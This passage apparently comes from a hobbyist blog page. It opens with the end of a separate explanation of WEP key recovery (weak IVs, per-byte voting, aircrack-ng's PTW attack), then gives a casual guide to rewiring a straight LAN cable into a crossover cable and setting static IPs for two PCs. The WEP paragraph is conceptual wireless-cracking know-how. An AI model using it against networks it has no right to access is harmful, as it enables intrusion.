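The 256 IVs per key byte used here are only the classic weak class; a real capture yields other usable IV classes as well, and aircrack-ng’s PTW attack exploits correlations over more keystream bytes, which is why it gets by with tens of thousands of frames rather than millions. Nothing in the attack depends on the key length: a 104-bit key just means 13 rounds of voting instead of 5.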

 

HACK ATTACK [Convert a straight LAN cable to patch in 2 minutes]

This is about making a patch or crossover cable if you have many straight spare ones lying around, as was the case with me. I needed a patch cable to network my PC and notebook but had left my patch cable at one of my friends’. This is a simple 2 minute hack that converts a straight (straight-through) cable into a crossover cable, which is what this post calls a “patch” cable: the transmit pair of one end is wired to the receive pair of the other, so two computers can be connected directly without a switch or hub.

Requirements:-

Straight LAN cable [the ones that connect routers and modems to your computer]

A pair of scissors or a wire stripper [I would recommend good ones because we will be cutting wires]

Tape [you might want to cover up the loose ends and exposed wires]

Cut the cable in the middle. We only need 4 wires: the orange pair and the green pair. On a 10/100 Mbit link these carry transmit and receive; the blue and brown pairs are unused, which is why this works for 100 Mbit but not for gigabit, which needs all four pairs.

Strip the wire pairs about 1 cm.

Connect the solid green to the solid orange and the striped green to the striped orange, and you are done. This swaps pins 1 and 2 with pins 3 and 6, which is exactly what a factory-made crossover cable does, as long as both plugs of the original cable are wired to the same standard (both T568A or both T568B, which is what makes it a straight cable in the first place).

This won’t take you more than 5 minutes even if you are a noob.

Now use tape if you want. I left mine as such.

Connect the two computers using this wire. (Many newer network cards detect a straight connection and swap the pairs themselves, called Auto-MDIX; with two such cards no crossover is needed at all.)

Go to Network Connections, select the appropriate network adapter, go to its Properties, select Internet Protocol (TCP/IP) and assign an IP address in the range 192.168.1.x with subnet mask 255.255.255.0,

where x is any number between 1 and 254 (192.168.1.0 is the network address and 192.168.1.255 the broadcast address, so neither can be used for a host).

Do the same on the other computer too, but this time choose some other value for x.

Now we need to set up our computers for peer-to-peer (workgroup) networking.

We need to follow this on both computers.

In Network Connections, in the left side pane, click “Set up a small home or office network”, then Next, just select the third option in the list and keep clicking Next. [Sorry for the very crude instructions, no time... writing from the college lab ;)] Will edit it to add more detail once I have time...

Restart both computers and ping the other machine’s address (for example “ping 192.168.1.2” from the computer that got 192.168.1.1). If you get a reply you are done, and congratulations.

If not, troubleshoot: just Google it or mail me. I would be glad to help.